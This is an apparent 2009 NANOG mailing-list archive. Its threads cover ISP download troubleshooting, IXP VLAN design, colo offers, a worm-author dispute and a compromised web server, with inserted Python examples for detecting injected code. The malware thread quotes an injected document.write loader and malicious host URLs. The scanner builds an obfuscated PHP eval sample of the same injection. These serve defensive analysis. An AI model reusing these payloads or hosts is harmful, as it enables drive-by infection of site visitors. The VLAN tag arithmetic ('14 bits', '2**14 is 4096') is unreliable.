> > http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
> >
> > - - ferg
> >
> > -BEGIN PGP SIGNATURE-
> > Version: PGP Desktop 9.5.3 (Build 5003)
> >
> > wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> > /K0hKsJiAz4RGu8VQkyP+js=
> > =AzJq
> > -END PGP SIGNATURE-
> >
> >
> >
> > --
> > "Fergie", a.k.a. Paul Ferguson
> >  Engineering Architecture for the Internet
> >  fergdawgster(at)gmail.com
> >  ferg's tech blog: http://fergdawg.blogspot.com/
> >
>
>
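For anyone who has to find the same injection on their own servers, here is a small scanner for the two patterns this thread describes: a hidden, zero-size iframe pointing at a host you do not serve, and base64 blobs (in script or in PHP eval() wrappers) that decode to script. This is an added example, not code posted by anyone in the thread; the sample pages it scans are constructed for the example, and only the iframe URL is the one quoted above. The trusted-host list, marker strings and file extensions are assumptions you would tune for your own site.

```python
# Added example (not code from the thread or from any of the posters): a scanner
# for the two injection patterns discussed above, hidden zero-size iframes that
# point at an outside host, and base64 blobs that decode to script.  The sample
# pages are constructed for this example; only the iframe URL is from the thread.
import base64
import binascii
import os
import re
from urllib.parse import urlparse

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# 40+ base64 characters in a row; shorter runs are usually hashes or tokens
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_MARKERS = ("document.write", "<iframe", "eval(", "unescape(", "fromCharCode")
# the PHP side of the same trick: eval() over a decoder, as seen on the 404/php pages
PHP_EVAL = re.compile(r"eval\s*\(\s*(?:gzinflate|str_rot13|base64_decode)\s*\(", re.IGNORECASE)


def parse_attrs(attr_text):
    """Turn the inside of a tag into {name: value}, quotes stripped."""
    attrs = {}
    for m in ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return attrs.get("height") == "0" and attrs.get("width") == "0"


def hidden_iframes(text, trusted_hosts):
    """Hidden iframes whose src host is not one we serve ourselves."""
    found = []
    for m in IFRAME_TAG.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if is_hidden(attrs) and host not in trusted_hosts:
            found.append(("hidden_iframe", src))
    return found


def decoded_script_blobs(text):
    """Base64 runs that decode to something containing script markers."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue                          # not valid base64, or odd length
        hits = [k for k in SCRIPT_MARKERS if k in decoded]
        if hits:
            found.append(("base64_script", ",".join(hits)))
    return found


def scan(text, trusted_hosts=()):
    """All findings for one document as (kind, detail) tuples."""
    findings = hidden_iframes(text, {h.lower() for h in trusted_hosts})
    findings += decoded_script_blobs(text)
    m = PHP_EVAL.search(text)
    if m:
        findings.append(("php_eval_obfuscation", m.group(0)))
    return findings


def scan_tree(root, trusted_hosts=(), exts=(".html", ".htm", ".php", ".js")):
    """Walk a document root (the thread's case: every index.html plus the 404 pages)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="latin-1") as fh:
                    findings = scan(fh.read(), trusted_hosts)
                if findings:
                    yield path, findings


# --- constructed samples (not the thread's actual files) ---------------------
CLEAN_PAGE = ('<html><body><h1>Welcome</h1>'
              '<iframe src="https://www.example.com/map" width="300" height="200"></iframe>'
              '</body></html>')
INJECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://77.92.158.122/webmail/inc/web/index.php" '
    'style="display: none;" height="0" width="0"></iframe>')
_payload = (b"echo '<script>document.write(\"<iframe src=http://77.92.158.122/webmail/"
            b"inc/web/index.php width=0 height=0></iframe>\")</script>';")
OBFUSCATED_PHP = '<?php eval(base64_decode("' + base64.b64encode(_payload).decode() + '")); ?>'

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE), ("php", OBFUSCATED_PHP)):
        print(label, scan(page, trusted_hosts=["www.example.com"]))
```

Run scan_tree() over the document root with your own hostnames in trusted_hosts; a hidden iframe to a host you serve is a design choice, one to a host you have never heard of is the finding. The base64 check deliberately decodes every long run rather than matching on "base64_decode", because the JavaScript variant in this thread carries the blob in a script, not in PHP.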


Re: downloading speed

2009-04-17 Thread Julio Arruda


Several windows in the same PC, doing file transfer in parallel, each 
get the same speed as one.
The speed is peaking at some specific speed every single time, and the 
several windows reach this peak.


I smell classic TCP window size  bumping into (bandwidth x delay).

Have you tried with iperf, using UDP ?




Mike Lyon wrote:

Have him do a traceroute from his PC or router to where he is trying to
download from. Where is it choking?

On Fri, Apr 17, 2009 at 3:21 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:


Configuration

sh run interface FastEthernet1/3/1
Building configuration...
Current configuration : 351 bytes
!
interface FastEthernet1/3/1
 description CUST:xxx
 bandwidth 10
 ip address 116.0.85.13 255.255.255.252
 no ip redirects
 no ip directed-broadcast
 load-interval 30
 negotiation auto
 no cdp enable
end

No errors on the interface.
None of our customers on this router has complained to us about this issue.
I have changed this to "negotiation auto" as suggested by one of our
members.
Tomorrow the customer will test again and reply.
Round-trip time is good, no backbone choked.
Units will not make a bit of difference, as the customer tried troubleshooting the
issue after connecting a laptop directly to the 100 Mbps link.
In that case also the result was the same.

Regards
Chandrashakher Pawar
IPNOC
Customer & Services Operations
Tata communication AS6453
mobil + 91 9225633948 + 91 9324509268
learn.chan...@gmail.com







On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks 
wrote:

--- learn.chan...@gmail.com wrote:
From: chandrashakher pawar 

We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net his
downloading speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.
-


You would need to add more info for any meaningful troubleshooting to
occur.  Do you see errors on the interface?  Clear the counters and watch
for a while.

scott







Re: downloading speed

2009-04-17 Thread Bill OBrien
Based on the screen shot he's getting, 1536 bps or 192KB. Also if he is
opening several windows but downloading from the same source it may be a
congestion control mechanism on the server  or hosting provider side. What's
the utilization on the RT,  DSLAM and BRAS, all factors to performance.

Bill

On Fri, Apr 17, 2009 at 4:21 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:

> Configuration
> 
> sh run interface FastEthernet1/3/1
> Building configuration...
> Current configuration : 351 bytes
> !
> interface FastEthernet1/3/1
>  description CUST:xxx
>  bandwidth 10
>  ip address 116.0.85.13 255.255.255.252
>  no ip redirects
>  no ip directed-broadcast
>  load-interval 30
>  negotiation auto
>  no cdp enable
> end
> 
> No errors on the interface.
> None of our customers on this router has complained to us about this issue.
> I have changed this to "negotiation auto" as suggested by one of our
> members.
> Tomorrow the customer will test again and reply.
> Round-trip time is good, no backbone choked.
> Units will not make a bit of difference, as the customer tried troubleshooting the
> issue after connecting a laptop directly to the 100 Mbps link.
> In that case also the result was the same.
>
> Regards
> Chandrashakher Pawar
> IPNOC
> Customer & Services Operations
> Tata communication AS6453
> mobil + 91 9225633948 + 91 9324509268
> learn.chan...@gmail.com
>
>
>
>
>
>
>
> On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks  >wrote:
>
> >
> >
> > --- learn.chan...@gmail.com wrote:
> > From: chandrashakher pawar 
> >
> > We are a level one ISP. One of my customers is connected to Fast Ethernet.
> > His link speed is 100,000 kbps. While downloading anything from the net his
> > downloading speed does not go above 200 kbps.
> > While doing multiple downloads he gets around 200 kbps in every window. But
> > when he closes all the windows no change in downloading speed is observed.
> > -
> >
> >
> > You would need to add more info for any meaningful troubleshooting to
> > occur.  Do you see errors on the interface?  Clear the counters and watch
> > for a while.
> >
> > scott
> >
> >
>


US west coast personal colo

2009-04-17 Thread Sean Donelan


Is anyone still doing personal colo on the west coast?  I'm looking for a
new home for my personal server on the west coast, and it seems like
the economy has taken out most of the old personal colo offers. 
Even the old web page on www.vix.com/personalcolo is gone.





Re: US west coast personal colo

2009-04-17 Thread bmanning
On Fri, Apr 17, 2009 at 06:50:42PM -0400, Sean Donelan wrote:
> 
> Is anyone still doing personal colo on the west coast?  I'm looking for a
> new home for my personal server on the west coast, and it seems like
> the economy has taken out most of the old personal colo offers. 
> Even the old web page on www.vix.com/personalcolo is gone.
>

there are a few of us still around.

--bill



Re: IXP

2009-04-17 Thread Randy Bush
>> with the advent of vlan tags, the whole idea of CSMA for IXP networks
>> is passe.  just put each pair of peers into their own private tagged
>> vlan and let one of them allocate a V4 /30 and a V6 /64 for it.  as a
>> bonus, this prevents third party BGP (which nobody really liked which
>> sometimes got turned on by mistake) and prevents transit dumping
>> and/or "pointing default at" someone.  the IXP no longer needs any
>> address space, they're just a VPN provider.  shared-switch
>> connections are just virtual crossconnects.
> Large IXP have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?

now arnold, you're spoiling a great idea.  researchers could measure the
exchange to see if it ever fully converged (to steal a routing term).
nice paper there, and who cares about working connectivity.


randy



Re: IXP

2009-04-17 Thread Daniel Roesen
On Fri, Apr 17, 2009 at 04:10:32PM -0500, Richard A Steenbergen wrote:
> A far better way to implement this is with a web portal brokered virtual
> crossconnect system, which provisions MPLS martini pwe or vpls circuits
> between members.

A couple of years ago I thought of the same, and discovered that some
new MAEs were (supposed to be?) built on exactly that scheme. Hard to
have really new ideas these days. :)

http://meetings.apnic.net/meetings/19/docs/sigs/ix/ix-pres-bechly-mae-ext-services.pdf


Best regards,
Daniel

-- 
CLUE-RIPE -- Jabber: d...@cluenet.de -- d...@ircnet -- PGP: 0xA85C8AA0



Re: Personal Colo Referral

2009-04-17 Thread Eddy Martinez

Here is place for good rates and a good colo facility -

http://unixmechanix.com/

And Nathan's personal blog - http://mybrainhurts.com/blog/

Eddy

On Apr 17, 2009, at 4:05 PM, Eddy Martinez wrote:


Hi Sean,

I saw your request on the Nanog list.

I use and know Nathan in San diego -

Nathan Hubbard - nat...@unixmechanix.com

And his personal site - http://mybrainhurts.com/blog/

Good rates and good colo.

Eddy





Re: US west coast personal colo

2009-04-17 Thread Brielle Bruns

On 4/17/09 4:50 PM, Sean Donelan wrote:


Is anyone still doing personal colo on the west coast? I'm looking for a
new home for my personal server on the west coast, and it seems like
the economy has taken out most of the old personal colo offers. Even the
old web page on www.vix.com/personalcolo is gone.




Depending on needs, I do have some space open in Tacoma for 1U or 2U 
servers.  Plus we also have a Xen hosting platform in development.  We 
aren't doing this for profit - just looking to make enough to be self 
sustaining and moving to a full cabinet.


--
Brielle Bruns
The Summit Open Source Development Group
http://www.sosdg.org/ http://www.ahbl.org



Re: downloading speed

2009-04-17 Thread Jay Hennigan

chandrashakher pawar wrote:


No errors on the interface.
None of our customers on this router has complained to us about this issue.
I have changed this to "negotiation auto" as suggested by one of our members.
Tomorrow the customer will test again and reply.
Round-trip time is good, no backbone choked.
Units will not make a bit of difference, as the customer tried troubleshooting the
issue after connecting a laptop directly to the 100 Mbps link.
In that case also the result was the same.


Note that your screenshot displays bytes, not bits.  So it will display 
one-eighth the download speed measured in bits.


Check the TCP tuning on the downloading PC.  The fact that multiple 
windows achieve a higher aggregate speed points to this.  Use the Google 
link I supplied earlier, also search "Bandwidth-delay product".  Are 
both ends of the link a substantial geographic distance (several miles) 
apart?


Note that the adjustments for TCP tuning are to the TCP stack on the 
machine doing the download, not the network gear.


--
Jay Hennigan - CCIE #7880 - Network Engineering - j...@impulse.net
Impulse Internet Service  -  http://www.impulse.net/
Your local telephone and internet company - 805 884-6323 - WB6RDV
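Worked example of the bandwidth-delay product reasoning Jay is pointing at, added by the editor and not part of his post or the original thread. It models a single TCP flow whose receiver window is the limit (throughput ceiling = window / RTT), shows why N parallel downloads add up to roughly N times that ceiling until the link itself is the limit, runs the model backwards to infer the effective window from an observed window-limited rate, and reports the RFC 1323 window-scale shift a host would need to fill the pipe. The 100 Mbit/s, 250 ms, 64 KiB scenario at the bottom is constructed, not measured from the customer in the thread.

```python
"""Window-limited TCP throughput: why one download stalls well below link rate
while several parallel downloads add up (bandwidth-delay product model)."""
import math

MAX_UNSCALED_WINDOW = 65535   # largest window advertisable without the RFC 1323 scale option
MAX_WINDOW_SCALE = 14         # RFC 1323 caps the window-scale shift count at 14


def bdp_bytes(link_bps: float, rtt_s: float) -> float:
    """Bandwidth-delay product: bytes that must be in flight to keep the link full."""
    return link_bps * rtt_s / 8.0


def window_limited_bps(window_bytes: float, rtt_s: float) -> float:
    """Ceiling for one flow that never has more than window_bytes unacknowledged."""
    return window_bytes * 8.0 / rtt_s


def per_flow_ceiling_bps(link_bps: float, rtt_s: float, window_bytes: float) -> float:
    """A single flow is capped by whichever is smaller: the link or its window."""
    return min(link_bps, window_limited_bps(window_bytes, rtt_s))


def aggregate_ceiling_bps(link_bps: float, rtt_s: float, window_bytes: float, flows: int) -> float:
    """Parallel flows each get their own window, so the aggregate scales with the
    number of flows until the link itself becomes the limit."""
    return min(link_bps, flows * window_limited_bps(window_bytes, rtt_s))


def inferred_window_bytes(observed_bps: float, rtt_s: float) -> float:
    """Inverse model: if one flow is window-limited, its rate and RTT reveal the window."""
    return observed_bps * rtt_s / 8.0


def window_scale_needed(window_bytes: float) -> int:
    """Shift count the receiver must negotiate so its 16-bit window field can
    express window_bytes (0 means the unscaled 65535-byte window already suffices)."""
    if window_bytes <= MAX_UNSCALED_WINDOW:
        return 0
    shift = math.ceil(math.log2(window_bytes / MAX_UNSCALED_WINDOW))
    if shift > MAX_WINDOW_SCALE:
        raise ValueError("window larger than TCP can advertise even with scaling")
    return shift


def diagnose(link_bps: float, rtt_s: float, window_bytes: float, flows: int = 1) -> dict:
    """Summarise whether a path is link-limited or window-limited for a host window."""
    need = bdp_bytes(link_bps, rtt_s)
    return {
        "bdp_bytes": need,
        "per_flow_bps": per_flow_ceiling_bps(link_bps, rtt_s, window_bytes),
        "aggregate_bps": aggregate_ceiling_bps(link_bps, rtt_s, window_bytes, flows),
        "window_limited": window_bytes < need,
        "window_scale_needed": window_scale_needed(need),
    }


if __name__ == "__main__":
    # Constructed scenario: 100 Mbit/s access link, 250 ms RTT, host stuck at the
    # classic unscaled 65535-byte window, ten downloads in parallel.
    print(diagnose(100e6, 0.25, MAX_UNSCALED_WINDOW, flows=10))
```

The diagnosis is only meaningful once loss and duplex problems have been ruled out, which is why the thread's first steps (interface errors, negotiation) come before window tuning; a window-limited flow shows a flat rate that scales linearly with parallel connections, whereas a duplex mismatch shows errors and collapses under load regardless of how many windows are open.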



Re: IXP

2009-04-17 Thread Paul Vixie
Arnold Nipper  writes:

> On 18.04.2009 00:04 Paul Vixie wrote
>
>> ... has anybody ever run out of 1Q tags in an IXP context?
>
> Why? You only need 1 ;-)

really?  1?  at PAIX we started with three, two unicast (wrongheadedness)
and one multicast, then added another unicast for V6.  then came the VNI's,
so i'm betting there are hundreds or thousands at most PAIX nodes today.
are others just using one big shared network for everything?

i should expand on something i said earlier on this thread.  the progression
i saw at PAIX and later saw from inside MFN was that most new peerings would
happen on a shared port and then as that port filled up some peerings would
move to PNI.  given that success in these terms looks like a PNI, i'm loath
to build in any dependencies on the long term residency of a given peering on
a shared multiaccess subnet.

i should answer something said earlier: yes there's only 14 bits of tag and
yes 2**14 is 4096.  in the sparsest and most wasteful allocation scheme,
tags would be assigned 7:7 so there'd be a max of 64 peers.  it's more
likely that tags would be assigned by increment, but it's still nowhere
near enough for 300+ peers.  however, well before 300 peers, there'd be
enough staff and enough money to use something other than a switch in the
middle, so that the "tagspace" would be per-port rather than global to the
IXP.  Q in Q is not how i'd build this... cisco and juniper both have
hardware tunnelling capabilities that support this stuff...  it just means
as the IXP fabric grows it has to become router-based.

i've spent more than several late nights and long weekends dealing with the
problems of shared multiaccess IXP networks.  broadcast storms, poisoned ARP,
pointing default, unintended third party BGP, unintended spanning tree,
semitranslucent loops, unauthorized IXP LAN extension... all to watch the
largest flows move off to PNI as soon as somebody's port was getting full.

conventional wisdom says a shared fabric is fine.  conventional wisdom also
said that UNIX came only from bell labs, that computers and operating systems
were bought from the same vendor on a single PO, that protocols built for T1
customers who paid $1000 MRC would scale to DSL customers who paid $30 MRC,
that Well and Portal shell users should be allowed to use outbound SMTP, that
the internet would only be used cooperatively, and that business applications
were written in COBOL whereas scientific applications were written in FORTRAN,
and that the cool people all used BSD whereas Linux was just a toy.  so i
think conventional wisdom isn't perfectly ageless.
-- 
Paul Vixie



Re: downloading speed

2009-04-17 Thread b nickell
Duplex Mismatch looks to be the problem.

On Fri, Apr 17, 2009 at 3:23 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:

> Dear Group member,
>
> We are a level one ISP. One of my customers is connected to Fast Ethernet.
> His link speed is 100,000 kbps. While downloading anything from the net his
> downloading speed does not go above 200 kbps.
> While doing multiple downloads he gets around 200 kbps in every window. But
> when he closes all the windows no change in downloading speed is observed.
>
> our router is C12KPRP-K4P-M
>
> Please advise what could be the cause?
>
> --
> Regards
>
> Chandrashakher Pawar
> IPNOC
> Customer & Services Operations
> Tata communication AS6453
> mobile + 91 9225633948 + 91 9324509268
> learn.chan...@gmail.com
>



-- 
-B


www.vix.com/personalcolo (Re: US west coast personal colo)

2009-04-17 Thread Paul Vixie
i just restored http://www.vix.com/personalcolo/ from backup.  last update
2007.  i guess this calls for another round of "send me your updates, folks."

re:

Sean Donelan  writes:

> Is anyone still doing personal colo on the west coast?  I'm looking for a
> new home for my personal server on the west coast, and it seems like
> the economy has taken out most of the old personal colo offers. Even the
> old web page on www.vix.com/personalcolo is gone.
>
>
>

-- 
Paul Vixie



Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread andrew.wallace
by n3td3v  April 17, 2009 5:43 PM PDT

"The teenager who takes credit for the worms that hit Twitter earlier
this week has been hired by a Web application development firm and on
Friday released a fifth worm on the microblogging site, he said."

I hope the FBI nip him in the bud, this cannot continue, this needs to
be made an example of.

I want law enforcement / intelligence agencies to take control of the
situation, now.

http://news.cnet.com/8618-1009_3-10222373.html?communityId=2114&targetCommunityId=2114&blogId=83&messageId=7821482&tag=mncol;tback

I want this individual made an example of and I'm not joking.

Many thanks,

Andrew

Intelligencer &

Founder of n3td3v

British



Re: Malicious code just found on web server

2009-04-17 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills  wrote:


>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\">");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> > style="border:none">
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>

Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:

hxxp:// test1.ru /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of
crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-END PGP SIGNATURE-



-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
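Added example, not code from the thread or from any of the posters: detection logic for the injection pattern Chris and Fergie describe, a document.write()-built object (or a static iframe) with width and height zero that pulls a PDF from a host other than the page's own. The scanner decodes the JavaScript string literal so the escaped quotes parse as real attributes, accepts the defanged hxxp:// spelling used in analysis mail and refangs it before parsing the URL, and ignores hidden elements that load from the page's own host. The sample page is constructed, with a TEST-NET address (192.0.2.10) standing in for the real one.

```python
"""Find hidden drive-by loaders: zero-size or display:none object/iframe/embed tags
that pull content from another host, including ones built inside document.write()."""
import html
import re
from urllib.parse import urlparse

TAG_RE = re.compile(r'<(object|iframe|embed)\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'([\w:-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
DOCWRITE_RE = re.compile(
    r'document\.write\s*\(\s*("(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')', re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.IGNORECASE)


def js_unescape(literal: str) -> str:
    """Value of a quoted JS string literal: handles \\xNN, \\uNNNN and single-char escapes."""
    body = literal[1:-1]

    def repl(m):
        esc = m.group(1)
        if len(esc) > 1:                       # \xNN or \uNNNN
            return chr(int(esc[1:], 16))
        return {"n": "\n", "t": "\t", "r": "\r"}.get(esc, esc)

    return re.sub(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)', repl, body)


def refang(url: str) -> str:
    """Turn the defanged forms used in analysis mail (hxxp://, [.]) back into a real URL."""
    return re.sub(r'^h[xX]{2}p', 'http', url).replace('[.]', '.').replace('[:]', ':')


def _attrs(raw: str) -> dict:
    out = {}
    for m in ATTR_RE.finditer(raw):
        value = next(g for g in m.groups()[1:] if g is not None)
        out[m.group(1).lower()] = html.unescape(value)
    return out


def _zero(value) -> bool:
    return value is not None and re.fullmatch(r'\s*0+(px)?\s*', value) is not None


def find_hidden_loaders(page: str, page_host: str) -> list:
    """One finding per hidden loader whose src/data points off page_host."""
    fragments = [("document.write", js_unescape(m.group(1)))
                 for m in DOCWRITE_RE.finditer(page)]
    # Scan the static markup with the JS literals removed, so their escaped quotes
    # are not parsed a second time as malformed attributes.
    fragments.append(("html", DOCWRITE_RE.sub("", page)))
    findings = []
    for origin, text in fragments:
        for tag in TAG_RE.finditer(text):
            attrs = _attrs(tag.group(2))
            src = attrs.get("src") or attrs.get("data")
            if not src:
                continue
            url = refang(src.strip())
            host = (urlparse(url).hostname or "").lower()
            hidden = (_zero(attrs.get("width")) and _zero(attrs.get("height"))) \
                or bool(HIDDEN_STYLE_RE.search(attrs.get("style", "")))
            if hidden and host and host != page_host.lower():
                findings.append({"via": origin, "tag": tag.group(1).lower(),
                                 "url": url, "host": host, "type": attrs.get("type")})
    return findings


# Constructed sample page (not the compromised page from the thread): a
# document.write()-built 0x0 PDF object and a static 0x0 iframe, both pointing at
# TEST-NET address 192.0.2.10, plus two benign elements that must not be flagged.
SAMPLE_PAGE = r'''<html><body><h1>Welcome</h1>
<script type="text/javascript">
document.write("<object src=\"hxxp://192.0.2.10/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></object>");
</script>
<iframe src="hxxp://192.0.2.10/webmail/inc/web/include/x.pdf" width="0" height="0" style="border:none"></iframe>
<iframe src="https://www.example.org/player" width="640" height="480"></iframe>
<object data="/local/help.pdf" width="0" height="0"></object>
</body></html>'''

if __name__ == "__main__":
    for finding in find_hidden_loaders(SAMPLE_PAGE, "www.example.com"):
        print(finding)
```

The off-host test is what separates a drive-by loader from an ordinary tracking pixel or print-only frame on the site itself; in practice the host list from these findings is what goes into the block list Fergie mentions, after refanging.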



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread Jack Bates

andrew.wallace wrote:

I want this individual made an example of and im not joking.



And I'd like an example made of companies that ignore reports of 
security flaws and leave their customers open to such worms; not to 
mention giving the impression to misguided teenagers that the only way 
they will be heard is to release a worm.


Historically, I believe some companies have ignored security concerns 
until someone (sometimes non-maliciously) released a worm. Of course, 
even non-malicious worms can have unpredictable results which result in 
catastrophic behavior. The earliest examples predate my residence on the 
network, but I've read a small bug made them extremely bad.


Jack



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread andrew.wallace
So if Al-Qaeda blow up a shopping centre and the guy who masterminded
it turns out to be 17 he gets a job in MI5?

OH MY GOD.

On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates  wrote:
> andrew.wallace wrote:
>>
>> I want this individual made an example of and im not joking.
>>
>
> And I'd like an example made of companies that ignore reports of security
> flaws and leave their customers open to such worms; not to mention giving
> the impression to misguided teenagers that the only way they will be heard
> is to release a worm.
>
> Historically, I believe some companies have ignored security concerns until
> someone (sometimes non-maliciously) released a worm. Of course, even
> non-malicious worms can have unpredictable results which result in
> catastrophic behavior. The earliest examples predate my residence on the
> network, but I've read a small bug made them extremely bad.
>
> Jack
>
>



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread Chaim Rieger
And I want cnet to not report this crap.

They glamorise it.
--Original Message--
From: andrew.wallace
To: nanog@nanog.org
To: n3td3v
Subject: Re: Michael Mooney releases another worm: Law Enforcement / 
Intelligence Agency's do nothing
Sent: Apr 17, 2009 18:38

So if Al-Qaeda blow up a shopping centre and the guy who masterminded
it turns out to be 17 he gets a job in MI5?

OH MY GOD.

On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates  wrote:
> andrew.wallace wrote:
>>
>> I want this individual made an example of and im not joking.
>>
>
> And I'd like an example made of companies that ignore reports of security
> flaws and leave their customers open to such worms; not to mention giving
> the impression to misguided teenagers that the only way they will be heard
> is to release a worm.
>
> Historically, I believe some companies have ignored security concerns until
> someone (sometimes non-maliciously) released a worm. Of course, even
> non-malicious worms can have unpredictable results which result in
> catastrophic behavior. The earliest examples predate my residence on the
> network, but I've read a small bug made them extremely bad.
>
> Jack
>
>



Sent via BlackBerry from T-Mobile

Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread andrew.wallace
All I'm saying is "Cyber Security" needs to be taken as seriously as
"real life" security. Hopefully though the 60 day cyber security
review by Melissa Hathaway will shake things up.

Andrew

On Sat, Apr 18, 2009 at 2:49 AM, Chaim Rieger  wrote:
> And I want cnet to not report this crap.
>
> They glamorise it.
> --Original Message--
> From: andrew.wallace
> To: nanog@nanog.org
> To: n3td3v
> Subject: Re: Michael Mooney releases another worm: Law Enforcement / 
> Intelligence Agency's do nothing
> Sent: Apr 17, 2009 18:38
>
> So if Al-Qaeda blow up a shopping centre and the guy who masterminded
> it turns out to be 17 he gets a job in MI5?
>
> OH MY GOD.
>
> On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates  wrote:
>> andrew.wallace wrote:
>>>
>>> I want this individual made an example of and im not joking.
>>>
>>
>> And I'd like an example made of companies that ignore reports of security
>> flaws and leave their customers open to such worms; not to mention giving
>> the impression to misguided teenagers that the only way they will be heard
>> is to release a worm.
>>
>> Historically, I believe some companies have ignored security concerns until
>> someone (sometimes non-maliciously) released a worm. Of course, even
>> non-malicious worms can have unpredictable results which result in
>> catastrophic behavior. The earliest examples predate my residence on the
>> network, but I've read a small bug made them extremely bad.
>>
>> Jack
>>
>>
>
>
>
> Sent via BlackBerry from T-Mobile



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread Steve Pirk

I get it now... Chaim Rieger = netdev
Nice trick.

--
Steve

On Sat, 18 Apr 2009, Chaim Rieger wrote:


And I want cnet to not report this crap.

They glamorise it.
--Original Message--
From: andrew.wallace
To: nanog@nanog.org
To: n3td3v
Subject: Re: Michael Mooney releases another worm: Law Enforcement / 
Intelligence Agency's do nothing
Sent: Apr 17, 2009 18:38

So if Al-Qaeda blow up a shopping centre and the guy who masterminded
it turns out to be 17 he gets a job in MI5?

OH MY GOD.

On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates  wrote:

andrew.wallace wrote:


I want this individual made an example of and im not joking.



And I'd like an example made of companies that ignore reports of security
flaws and leave their customers open to such worms; not to mention giving
the impression to misguided teenagers that the only way they will be heard
is to release a worm.

Historically, I believe some companies have ignored security concerns until
someone (sometimes non-maliciously) released a worm. Of course, even
non-malicious worms can have unpredictable results which result in
catastrophic behavior. The earliest examples predate my residence on the
network, but I've read a small bug made them extremely bad.

Jack






Sent via BlackBerry from T-Mobile




Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread andrew.wallace
The network community and the security community need to collaborate
as much as possible to defeat the threats.

I'm British and I'm hoping to make the UK as secure as possible.

We can only do this by pulling together and reporting intelligence
between communities, whether that's on an open list such as NANOG or
on invitation-only lists run by law enforcement. It doesn't matter as
long as both communities are focused on cyber security.

Many thanks,

Andrew

On Sat, Apr 18, 2009 at 3:07 AM, Steve Pirk  wrote:
> I get it now... Chaim Rieger = netdev
> Nice trick.
>
> --
> Steve
>
> On Sat, 18 Apr 2009, Chaim Rieger wrote:
>
>> And I want cnet to not report this crap.
>>
>> They glamorise it.
>> --Original Message--
>> From: andrew.wallace
>> To: nanog@nanog.org
>> To: n3td3v
>> Subject: Re: Michael Mooney releases another worm: Law Enforcement /
>> Intelligence Agency's do nothing
>> Sent: Apr 17, 2009 18:38
>>
>> So if Al-Qaeda blow up a shopping centre and the guy who masterminded
>> it turns out to be 17 he gets a job in MI5?
>>
>> OH MY GOD.
>>
>> On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates  wrote:
>>>
>>> andrew.wallace wrote:

